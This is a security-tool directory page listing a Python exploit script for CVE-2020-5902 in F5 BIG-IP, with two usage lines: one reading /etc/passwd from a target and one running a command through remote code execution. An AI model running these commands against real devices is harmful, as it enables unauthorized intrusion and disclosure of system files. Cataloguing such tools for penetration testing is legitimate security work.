Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-5902 — Python exploit script for CVE-2020-5902 (F5 BIG-IP) supporting local file read and remote code execution via crafted HTTP requests. | Kitploit
Tools/GitHubGitHub/dunderhay/cve-2020-5902
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubdunderhay/cve-2020-5902

CVE-2020-5902

Python exploit script for CVE-2020-5902 (F5 BIG-IP) supporting local file read and remote code execution via crafted HTTP requests.

View Repository
36812 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-5902

Python script to exploit F5 Big-IP CVE-2020-5902

Examples

Exploit local file read: python3 CVE-2020-5902.py -t example.com -x lfr -f /etc/passwd

Exploit RCE: python3 CVE-2020-5902.py -t example.com -x rce -a list+auth+user+admin

Download Tool